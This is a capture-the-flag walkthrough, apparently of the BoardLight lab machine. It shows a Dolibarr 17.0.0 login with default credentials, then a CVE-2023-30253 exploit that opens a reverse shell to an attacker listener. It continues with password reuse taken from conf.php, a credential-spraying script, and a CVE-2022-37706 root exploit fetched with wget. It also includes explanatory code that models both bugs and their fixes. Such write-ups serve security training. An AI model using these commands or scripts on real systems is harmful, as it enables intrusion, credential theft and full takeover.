Proof of Concept

10.129.231.37

Nmap

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Initial Access

Browsing to http://10.129.231.37/ shows a domain name in the page footer:

  • board.htb

Add it to /etc/hosts:

┌──(kali㉿kali)-[~/BoardLight]
└─$ cat /etc/hosts
<SNIP>
10.129.231.37	board.htb

Subdomain (virtual host) enumeration

  • crm.board.htb found: its response (200, 6360 bytes) differs from the default vhost, so it is a real virtual host. The two 400 entries for #www.board.htb and #mail.board.htb come from commented-out lines in the wordlist and can be ignored.
┌──(kali㉿kali)-[~/BoardLight]
└─$ gobuster vhost -u http://board.htb -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -t 100 --append-domain
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                       http://board.htb
[+] Method:                    GET
[+] Threads:                   100
[+] Wordlist:                  /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt
[+] User Agent:                gobuster/3.8
[+] Timeout:                   10s
[+] Append Domain:             true
[+] Exclude Hostname Length:   false
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
crm.board.htb Status: 200 [Size: 6360]
#www.board.htb Status: 400 [Size: 301]
#mail.board.htb Status: 400 [Size: 301]
Progress: 19966 / 19966 (100.00%)
===============================================================
Finished
===============================================================

Add the subdomain to /etc/hosts:

┌──(kali㉿kali)-[~/BoardLight]
└─$ cat /etc/hosts
<SNIP>
10.129.231.37	board.htb	crm.board.htb

http://crm.board.htb serves a login page; the default credentials admin/admin work.

The login page identifies the application as Dolibarr 17.0.0. Versions before 17.0.1 are affected by CVE-2023-30253, an authenticated remote code execution: a user who can edit pages in the website module can get PHP executed on the server, because the check that blocks an embedded "<?php" tag is case-sensitive while the PHP engine also accepts "<?PHP".
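To make the bypass concrete, the following is an added example (not Dolibarr's source and not part of the original writeup): a constructed model of the content check, in which the filter extracts PHP blocks by the lowercase opening tag and scans them for dangerous functions, next to a hardened version that matches the tag case-insensitively. The FORBIDDEN list, the sample page bodies and the exact shape of the check are assumptions for illustration; what is taken from the CVE record is only that "<?PHP" evaded the 17.0.0 check and still executed.

```python
import re

# Added example: constructed model of the Dolibarr 17.0.0 website-module check
# behind CVE-2023-30253, NOT the project's code. The assumption modelled here:
# PHP blocks are located by the lowercase "<?php" tag and then scanned for
# dangerous calls, while PHP's lexer accepts the tag in any case.

# Illustrative subset of functions a content filter refuses inside PHP blocks.
FORBIDDEN = ("system", "exec", "shell_exec", "passthru", "popen", "proc_open")

# 17.0.0-style extraction: case-sensitive, lowercase tag only.
_LOWER_TAG = re.compile(r"<\?php(.*?)(?:\?>|$)", re.DOTALL)
# Hardened extraction: any case of "<?php", plus the short echo tag "<?=".
_ANY_TAG = re.compile(r"<\?(?:php\b|=)(.*?)(?:\?>|$)", re.DOTALL | re.IGNORECASE)


def _blocks_contain_forbidden(blocks):
    """True if any extracted PHP block calls a forbidden function."""
    return any(re.search(rf"\b{f}\s*\(", block) for block in blocks for f in FORBIDDEN)


def vulnerable_accepts(content: str) -> bool:
    """Model of 17.0.0: only blocks opened by lowercase '<?php' are inspected."""
    return not _blocks_contain_forbidden(_LOWER_TAG.findall(content))


def hardened_accepts(content: str) -> bool:
    """Case-insensitive tag detection, so '<?PHP' and '<?=' are inspected too."""
    return not _blocks_contain_forbidden(_ANY_TAG.findall(content))


def php_executes(content: str) -> bool:
    """What the PHP engine does: an opening tag in any case starts PHP code."""
    return _ANY_TAG.search(content) is not None


# Constructed page bodies a website-module user might submit.
SAMPLES = {
    "plain html": "<p>Welcome</p>",
    "lowercase tag": "<?php system($_GET['c']); ?>",
    "uppercase tag": "<?PHP system($_GET['c']); ?>",
    "mixed case tag": "<?Php passthru($_GET['c']); ?>",
    "short echo tag": "<?= shell_exec('id') ?>",
    "harmless php": "<?php echo date('Y'); ?>",
}


def bypasses(filter_fn, samples=SAMPLES):
    """Names of samples the given filter accepts although they contain a
    forbidden call that PHP would execute."""
    return [
        name
        for name, body in samples.items()
        if filter_fn(body)
        and php_executes(body)
        and _blocks_contain_forbidden(_ANY_TAG.findall(body))
    ]


if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(f"{name:15} vulnerable={vulnerable_accepts(body)!s:5} "
              f"hardened={hardened_accepts(body)!s:5} executes={php_executes(body)}")
    print("bypasses of vulnerable filter:", bypasses(vulnerable_accepts))
```

The takeaway for reviewing similar filters: a deny-list applied to a case-sensitive or single-spelling match of a token that the downstream interpreter accepts in several spellings is not a filter at all; the check has to use the same tokenisation the interpreter does, or the content must not be interpreted in the first place.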

Download the PoC

┌──(kali㉿kali)-[~/BoardLight]
└─$ git clone https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253.git
Cloning into 'Exploit-for-Dolibarr-17.0.0-CVE-2023-30253'...
remote: Enumerating objects: 18, done.
remote: Counting objects: 100% (18/18), done.
remote: Compressing objects: 100% (16/16), done.
remote: Total 18 (delta 3), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (18/18), 9.17 KiB | 4.59 MiB/s, done.
Resolving deltas: 100% (3/3), done.

Run the PoC (arguments: target URL, username, password, listener IP, listener port)

┌──(kali㉿kali)-[~/BoardLight/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253]
└─$ python exploit.py http://crm.board.htb admin admin 10.10.14.17 4444
[*] Trying authentication...
[**] Login: admin
[**] Password: admin
[*] Trying created site...
[*] Trying created page...
[*] Trying editing page and call reverse shell... Press Ctrl+C after successful connection

Reverse shell received on the listener

┌──(kali㉿kali)-[~/BoardLight]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.17] from (UNKNOWN) [10.129.231.37] 43766
bash: cannot set terminal process group (814): Inappropriate ioctl for device
bash: no job control in this shell
www-data@boardlight:~/html/crm.board.htb/htdocs/public/website$

Lateral Movement (auth as larissa)

The Dolibarr configuration file ~/html/crm.board.htb/htdocs/conf/conf.php, readable by www-data, contains the database password

www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ cat conf.php
cat conf.php
<?php
//
// File generated by Dolibarr installer 17.0.0 on May 13, 2024
//
// Take a look at conf.php.example file for an example of conf.php file
// and explanations for all possibles parameters.
//
$dolibarr_main_url_root='http://crm.board.htb';
$dolibarr_main_document_root='/var/www/html/crm.board.htb/htdocs';
$dolibarr_main_url_root_alt='/custom';
$dolibarr_main_document_root_alt='/var/www/html/crm.board.htb/htdocs/custom';
$dolibarr_main_data_root='/var/www/html/crm.board.htb/documents';
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
<SNIP>

The database password is reused for the local account larissa: SSH login with it succeeds

┌──(kali㉿kali)-[~/BoardLight/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253]
└─$ sshpass -p 'serverfun2$2023!!' ssh larissa@10.129.231.37
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
 
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
 
larissa@boardlight:~$
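Harvesting the secret and trying it against local accounts is the step done by hand above. The following is an added example, not code from the writeup or from Dolibarr: a small parser for the $name='value'; assignments in a Dolibarr conf.php (handling PHP's single-quote escapes), a filter for the keys that hold credentials, and a pairing with the users from /etc/passwd that have a real login shell. The sample conf.php and passwd excerpt are constructed placeholders, not the box's files.

```python
import re

# Added example. Constructed conf.php-shaped sample (placeholder values).
SAMPLE_CONF = r"""<?php
//
// File generated by Dolibarr installer 17.0.0
//
$dolibarr_main_url_root='http://crm.example.htb';
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='s3cret\'s$2023!!';
$dolibarr_main_authentication='dolibarr';
"""

# Constructed /etc/passwd excerpt: only accounts with an interactive shell are
# worth spraying a harvested password against.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
larissa:x:1000:1000:larissa:/home/larissa:/bin/bash
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
"""

# $name='value'; where the single-quoted value may contain \' and \\ escapes.
_ASSIGN = re.compile(r"^\s*\$(\w+)\s*=\s*'((?:[^'\\]|\\.)*)'\s*;", re.MULTILINE)


def parse_php_config(text: str) -> dict:
    """Extract single-quoted PHP assignments, unescaping \\' and \\\\ as PHP does."""
    return {name: re.sub(r"\\(['\\])", r"\1", raw) for name, raw in _ASSIGN.findall(text)}


def secrets_from_config(cfg: dict) -> dict:
    """Keys that look like credentials or signing material."""
    return {k: v for k, v in cfg.items() if re.search(r"pass|secret|key|unique_id", k, re.I)}


def login_users(passwd_text: str) -> list:
    """Usernames whose shell is not nologin/false."""
    return [
        line.split(":")[0]
        for line in passwd_text.splitlines()
        if line.strip() and not line.rstrip().endswith(("nologin", "/bin/false"))
    ]


def spray_candidates(conf_text: str, passwd_text: str) -> list:
    """(user, password) pairs to try over SSH or su: every harvested secret
    against every interactive account."""
    secrets = secrets_from_config(parse_php_config(conf_text))
    users = login_users(passwd_text)
    return [(u, p) for p in secrets.values() for u in users]


if __name__ == "__main__":
    import sys
    conf = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_CONF
    passwd = open(sys.argv[2]).read() if len(sys.argv) > 2 else SAMPLE_PASSWD
    for user, pw in spray_candidates(conf, passwd):
        print(f"{user}:{pw}")
```

Run it on the target as python3 harvest.py /var/www/html/crm.board.htb/htdocs/conf/conf.php /etc/passwd and feed the user:password lines to sshpass or hydra; the shell-escaping problem seen with sshpass -p '...' above is avoided by reading the password from the file rather than retyping it.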

Read user.txt

larissa@boardlight:~$ cat user.txt
bde6264799d9524fddbe145563d271ff
larissa@boardlight:~$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.129.231.37  netmask 255.255.0.0  broadcast 10.129.255.255
        inet6 dead:beef::250:56ff:feb0:c7d4  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb0:c7d4  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b0:c7:d4  txqueuelen 1000  (Ethernet)
        RX packets 822119  bytes 76192948 (76.1 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 772424  bytes 300527489 (300.5 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 10390  bytes 817888 (817.8 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 10390  bytes 817888 (817.8 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Privilege Escalation

Running linux-smart-enumeration flags uncommon setuid binaries; all but the VMware wrapper belong to the Enlightenment window manager

<SNIP>
---
[!] fst020 Uncommon setuid binaries........................................ yes!
---
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
/usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
/usr/bin/vmware-user-suid-wrapper
<SNIP>

Check the Enlightenment version

  • Version: 0.23.1
larissa@boardlight:~$ enlightenment -version
ESTART: 0.00001 [0.00001] - Begin Startup
ESTART: 0.00007 [0.00006] - Signal Trap
ESTART: 0.00008 [0.00001] - Signal Trap Done
ESTART: 0.00010 [0.00002] - Eina Init
ESTART: 0.00053 [0.00043] - Eina Init Done
ESTART: 0.00055 [0.00002] - Determine Prefix
ESTART: 0.00075 [0.00020] - Determine Prefix Done
ESTART: 0.00077 [0.00002] - Environment Variables
ESTART: 0.00079 [0.00002] - Environment Variables Done
ESTART: 0.00079 [0.00001] - Parse Arguments
Version: 0.23.1
E: Begin Shutdown Procedure!

Enlightenment 0.23.1 is affected by CVE-2022-37706, a local privilege escalation in the Enlightenment window manager (versions before 0.25.4): the setuid-root helper enlightenment_sys accepts a mount device path that merely begins with /dev/, so /dev/../ passes the check, and it runs the assembled mount command line through system(), so a ';' in that path injects a command that executes as root.

Download the PoC

┌──(kali㉿kali)-[~/BoardLight]
└─$ git clone https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit.git
Cloning into 'CVE-2022-37706-LPE-exploit'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (92/92), done.
remote: Compressing objects: 100% (92/92), done.
remote: Total 92 (delta 32), reused 14 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (92/92), 498.76 KiB | 1.62 MiB/s, done.
Resolving deltas: 100% (32/32), done.

Serve exploit.sh from Kali over HTTP (port 8000), fetch it on the target and run it to obtain a root shell. The "mount: /dev/../tmp/: can't find in /etc/fstab." line is the expected, harmless failure of the mount call that precedes the injected ';' in the device path.

larissa@boardlight:~$ wget http://10.10.14.17:8000/exploit.sh
--2026-02-03 08:18:49--  http://10.10.14.17:8000/exploit.sh
Connecting to 10.10.14.17:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 709 [application/x-sh]
Saving to: ‘exploit.sh’
 
exploit.sh                                    100%[==============================================================================================>]     709  --.-KB/s    in 0.001s
 
2026-02-03 08:18:50 (603 KB/s) - ‘exploit.sh’ saved [709/709]
 
larissa@boardlight:~$ chmod a+x exploit.sh
larissa@boardlight:~$ ./exploit.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
mount: /dev/../tmp/: can't find in /etc/fstab.
# 
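The two defects the PoC chains (a prefix check on an uncanonicalised path, and a command string handed to the shell) are modelled below. This is an added example, not the enlightenment_sys C source and not the PoC: the check and command assembly are a constructed simplification, the device string is of the shape the public PoC passes (assumed here), and the shell-parsing helper only models ';' as a separator. The hardened functions show the two fixes a reviewer would ask for: canonicalise with realpath() before the prefix test, and execute with an argv list instead of system().

```python
import os
import shlex

# Added example: constructed model of the CVE-2022-37706 logic, not the
# project's code. The setuid helper accepted a "device" for mount if the
# string started with "/dev/" and then ran the assembled line via system().

DEVICE_PREFIX = "/dev/"


def vulnerable_authorize(device: str) -> bool:
    """Bare string-prefix test: '/dev/../tmp/;/tmp/exploit' passes."""
    return device.startswith(DEVICE_PREFIX)


def vulnerable_command_line(options: str, device: str, mountpoint: str) -> str:
    """One string assembled for system(): the shell re-parses it."""
    return "/bin/mount -o {} {} {}".format(options, device, mountpoint)


def shell_would_run(cmdline: str) -> list:
    """Approximate /bin/sh parsing of that string: ';' ends a command.
    (Model covers ';' only; a real shell also honours &&, |, $(...) etc.)"""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=";")
    lexer.whitespace_split = True
    commands, current = [], []
    for tok in lexer:
        if tok == ";":
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


def hardened_authorize(device: str) -> bool:
    """Canonicalise first: realpath() collapses '..' and follows symlinks, so
    '/dev/../tmp/...' resolves to '/tmp/...' and fails the prefix test."""
    if not os.path.isabs(device) or "\x00" in device:
        return False
    return os.path.realpath(device).startswith(DEVICE_PREFIX)


def hardened_argv(options: str, device: str, mountpoint: str) -> list:
    """Pass an argv list to execve()/subprocess with no shell: a ';' in the
    device name is then just a byte in a filename, not a separator."""
    return ["/bin/mount", "-o", options, device, mountpoint]


# Device argument of the shape the public PoC uses (assumed), and a real one.
EXPLOIT_DEVICE = "/dev/../tmp/;/tmp/exploit"
LEGIT_DEVICE = "/dev/null"
MOUNT_OPTS = "noexec,nosuid,nodev"


if __name__ == "__main__":
    line = vulnerable_command_line(MOUNT_OPTS, EXPLOIT_DEVICE, "/tmp///net")
    print("vulnerable accepts exploit device:", vulnerable_authorize(EXPLOIT_DEVICE))
    print("system() would run, in order:")
    for cmd in shell_would_run(line):
        print("   ", cmd)
    print("hardened accepts exploit device:  ", hardened_authorize(EXPLOIT_DEVICE))
    print("hardened accepts", LEGIT_DEVICE + ":", hardened_authorize(LEGIT_DEVICE))
    print("hardened argv:", hardened_argv(MOUNT_OPTS, EXPLOIT_DEVICE, "/tmp///net"))
```

The first command the model produces is mount with a single non-option argument, which is exactly what fails with "can't find in /etc/fstab" in the output above; the second, /tmp/exploit, is what runs as root. Note that realpath() alone is not enough if the helper keeps using system(): both fixes are needed, and the argv one is the more important of the two.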

Read root.txt

# cat root.txt
15683a906987124202a9eed46013b41e
# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.129.231.37  netmask 255.255.0.0  broadcast 10.129.255.255
        inet6 dead:beef::250:56ff:feb0:c7d4  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb0:c7d4  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b0:c7:d4  txqueuelen 1000  (Ethernet)
        RX packets 825869  bytes 76573934 (76.5 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 773922  bytes 300807675 (300.8 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 11884  bytes 935442 (935.4 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 11884  bytes 935442 (935.4 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0